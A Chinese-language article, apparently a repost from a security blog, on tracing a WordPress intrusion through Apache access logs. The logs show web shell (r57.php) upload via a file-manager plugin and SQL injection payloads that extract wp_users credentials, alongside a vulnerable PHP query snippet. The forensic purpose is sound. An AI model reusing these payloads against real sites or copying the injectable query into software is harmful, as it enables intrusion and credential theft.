本文讲的是
如何从日志文件溯源出攻击手法?,
如果想要查清系统遭到黑客入侵的原因或漏洞,通过日志查找是一种很好的方法。日志文件是由服务器提供的非常有价值的信息。几乎所有的服务器,服务和应用程序都提供某种日志记录。但是什么是日志文件?日志文件是记录服务或应用程序运行期间发生的事件和操作。
88.54.124.17 - - [16 / Apr / 2016:07:44:08 +0100]“GET /main.php HTTP / 1.1”200 203“ - ”“Mozilla / 5.0(Windows NT 6.0; WOW64; rv:45.0) Gecko / 20100101 Firefox / 45.0“
root@secureserver:/var/log/apache2# less access.log
84.55.41.57 - - [16/Apr/2016:20:21:56 +0100] "GET /john/index.php HTTP/1.1" 200 3804 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 84.55.41.57 - - [16/Apr/2016:20:21:56 +0100] "GET /john/assets/js/skel.min.js HTTP/1.1" 200 3532 "http://www.example.com/john/index.php" "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 84.55.41.57 - - [16/Apr/2016:20:21:56 +0100] "GET /john/images/pic01.jpg HTTP/1.1" 200 9501 "http://www.example.com/john/index.php" "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 84.55.41.57 - - [16/Apr/2016:20:21:56 +0100] "GET /john/images/pic03.jpg HTTP/1.1" 200 5593 "http://www.example.com/john/index.php" "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
root@secureserver:~#cat /var/log/apache2/access.log | grep -E "wp-admin|wp-login|POST /"
84.55.41.57 - - [17/Apr/2016:06:52:07 +0100] "GET /wordpress/wp-admin/ HTTP/1.1" 200 12349 "http://www.example.com/wordpress/wp-login.php" "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
root@secureserver:~#cat /var/log/apache2/access.log | grep 84.55.41.57
84.55.41.57 - - [17/Apr/2016:06:57:24 +0100] "GET /wordpress/wp-login.php HTTP/1.1" 200 1568 "-" 84.55.41.57 - - [17/Apr/2016:06:57:31 +0100] "POST /wordpress/wp-login.php HTTP/1.1" 302 1150 "http://www.example.com/wordpress/wp-login.php" 84.55.41.57 - - [17/Apr/2016:06:57:31 +0100] "GET /wordpress/wp-admin/ HTTP/1.1" 200 12905 "http://www.example.com/wordpress/wp-login.php" 84.55.41.57 - - [17/Apr/2016:07:00:32 +0100] "POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1" 200 454 "http://www.example.com/wordpress/wp-admin/" 84.55.41.57 - - [17/Apr/2016:07:00:58 +0100] "GET /wordpress/wp-admin/theme-editor.php HTTP/1.1" 200 20795 "http://www.example.com/wordpress/wp-admin/" 84.55.41.57 - - [17/Apr/2016:07:03:17 +0100] "GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentysixteen HTTP/1.1" 200 8092 "http://www.example.com/wordpress/wp-admin/theme-editor.php" 84.55.41.57 - - [17/Apr/2016:07:11:48 +0100] "GET /wordpress/wp-admin/plugin-install.php HTTP/1.1" 200 12459 "http://www.example.com/wordpress/wp-admin/plugin-install.php?tab=upload" 84.55.41.57 - - [17/Apr/2016:07:16:06 +0100] "GET /wordpress/wp-admin/update.php?action=install-plugin&plugin=file-manager&_wpnonce=3c6c8a7fca HTTP/1.1" 200 5698 "http://www.example.com/wordpress/wp-admin/plugin-install.php?tab=search&s=file+permission" 84.55.41.57 - - [17/Apr/2016:07:18:19 +0100] "GET /wordpress/wp-admin/plugins.php?action=activate&plugin=file-manager%2Ffile-manager.php&_wpnonce=bf932ee530 HTTP/1.1" 302 451 "http://www.example.com/wordpress/wp-admin/update.php?action=install-plugin&plugin=file-manager&_wpnonce=3c6c8a7fca" 84.55.41.57 - - [17/Apr/2016:07:21:46 +0100] "GET /wordpress/wp-admin/admin-ajax.php?action=connector&cmd=upload&target=l1_d3AtY29udGVudA&name%5B%5D=r57.php&FILES=&_=1460873968131 HTTP/1.1" 200 731 "http://www.example.com/wordpress/wp-admin/admin.php?page=file-manager_settings" 84.55.41.57 - - [17/Apr/2016:07:22:53 +0100] "GET /wordpress/wp-content/r57.php HTTP/1.1" 200 9036 "-" 84.55.41.57 - - [17/Apr/2016:07:32:24 +0100] "POST /wordpress/wp-content/r57.php?14 HTTP/1.1" 200 8030 "http://www.example.com/wordpress/wp-content/r57.php?14" 84.55.41.57 - - [17/Apr/2016:07:29:21 +0100] "GET /wordpress/wp-content/r57.php?29 HTTP/1.1" 200 8391 "http://www.example.com/wordpress/wp-content/r57.php?28" 84.55.41.57 - - [17/Apr/2016:07:57:31 +0100] "POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1" 200 949 "http://www.myw ebsite.com/wordpre ss/wp-admin/admin.php?page=file-manager_settings"
84.55.41.57 - GET /wordpress/wp-login.php 200
84.55.41.57 - POST /wordpress/wp-login.php 302
84.55.41.57 - GET /wordpress/wp-admin/ 200
84.55.41.57 - GET /wordpress/wp-admin/theme-editor.php 200
84.55.41.57 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= twentysixteen 200
84.55.41.57 - GET /wordpress/wp-admin/plugin-install.php 200
84.55.41.57 - GET /wordpress/wp-admin/update.php?action=install-plugin&plugin= file-manager &_wpnonce=3c6c8a7fca 200 84.55.41.57 - GET /wordpress/wp-admin/plugins.php?action=activate&plugin=file-manager%2Ffile-manager.php&_wpnonce=bf932ee530 200
84.55.41.57 - GET /wordpress/wp-admin/admin-ajax.php?action=connector& cmd= upload&target=l1_d3AtY29udGVudA&name%5B%5D=r57.php&FILES=&_=1460873968131 200
84.55.41.57 - GET /wordpress/wp-content/r57.php 200 84.55.41.57 - POST /wordpress/wp-content/r57.php?1 200 84.55.41.57 - GET /wordpress/wp-content/r57.php?28 200
84.55.41.57- - [14 / Apr / 2016:08:22:13 0100]“GET /wordpress/wp-content/plugins/custom_plugin/check_user.php?userid=1 AND(SELECT 6810 FROM(SELECT COUNT(*) ,CONCAT(0x7171787671,(SELECT(ELT(6810 = 6810,1))),0x71707a7871,FLOOR(RAND(0)* 2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)HTTP / 1.1“200 166” “Mozilla / 5.0(Windows; U; Windows NT 6.1; ru; rv:1.9.2.3)Gecko / 20100401 Firefox / 4.0(.NET CLR 3.5.30729)” 84.55.41.57- - [14 / Apr / 2016:08:22:13 0100]“GET /wordpress/wp-content/plugins/custom_plugin/check_user.php?userid=(SELECT 7505 FROM(SELECT COUNT(*),CONCAT (0x7171787671,(SELECT(ELT(7505 = 7505,1))),0x71707a7871,FLOOR(RAND(0)* 2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)HTTP / 1.1“200 166” - “” Mozilla / 5.0(Windows; U; Windows NT 6.1; ru; rv:1.9.2.3)Gecko / 20100401 Firefox / 4.0(.NET CLR 3.5.30729)“ 84.55.41.57- - [14 / Apr / 2016:08:22:13 0100]“GET /wordpress/wp-content/plugins/custom_plugin/check_user.php?userid=(SELECT CONCAT(0x7171787671,(SELECT(ELT(1399 = / /(Windows; U; Windows NT 6.1; ru; rv:1.9.2.3)Gecko / 20100401 Firefox / 4.0(.NET) CLR 3.5.30729)“ 84.55.41.57- - [14 / Apr / 2016:08:22:27 0100]“GET /wordpress/wp-content/plugins/custom_plugin/check_user.php?userid=1 UNION ALL SELECT CONCAT(0x7171787671,0x537653544175467a724f,0x71707a7871) ,NULL,NULL - HTTP / 1.1“200 182” - “”Mozilla / 5.0(Windows; U; Windows NT 6.1; ru; rv:1.9.2.3)Gecko / 20100401 Firefox / 4.0(.NET CLR 3.5.30729) “
<?php //Include the WordPress header include('/wordpress/wp-header.php'); global $wpdb; // Use the GET parameter ‘userid’ as user input $id=$_GET['userid']; // Make a query to the database with the value the user supplied in the SQL statement $users = $wpdb->get_results( "SELECT * FROM users WHERE user_id=$id"); ?>
/wordpress/wp-content/plugins/my_custom_plugin/check_user.php?userid=-6859 UNION ALL SELECT (SELECT CONCAT(0x7171787671,IFNULL(CAST(ID AS CHAR),0x20),0x616474686c76,IFNULL(CAST(display_name AS CHAR),0x20),0x616474686c76,IFNULL(CAST(user_activation_key AS CHAR),0x20),0x616474686c76,IFNULL(CAST(user_email AS CHAR),0x20),0x616474686c76,IFNULL(CAST(user_login AS CHAR),0x20),0x616474686c76,IFNULL(CAST(user_nicename AS CHAR),0x20),0x616474686c76,IFNULL(CAST(user_pass AS CHAR),0x20),0x616474686c76,IFNULL(CAST(user_registered AS CHAR),0x20),0x616474686c76,IFNULL(CAST(user_status AS CHAR),0x20),0x616474686c76,IFNULL(CAST(user_url AS CHAR),0x20),0x71707a7871) FROM wp.wp_users LIMIT 0,1),NULL,NULL--
原文发布时间为:2017年9月8日
本文作者:愣娃
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。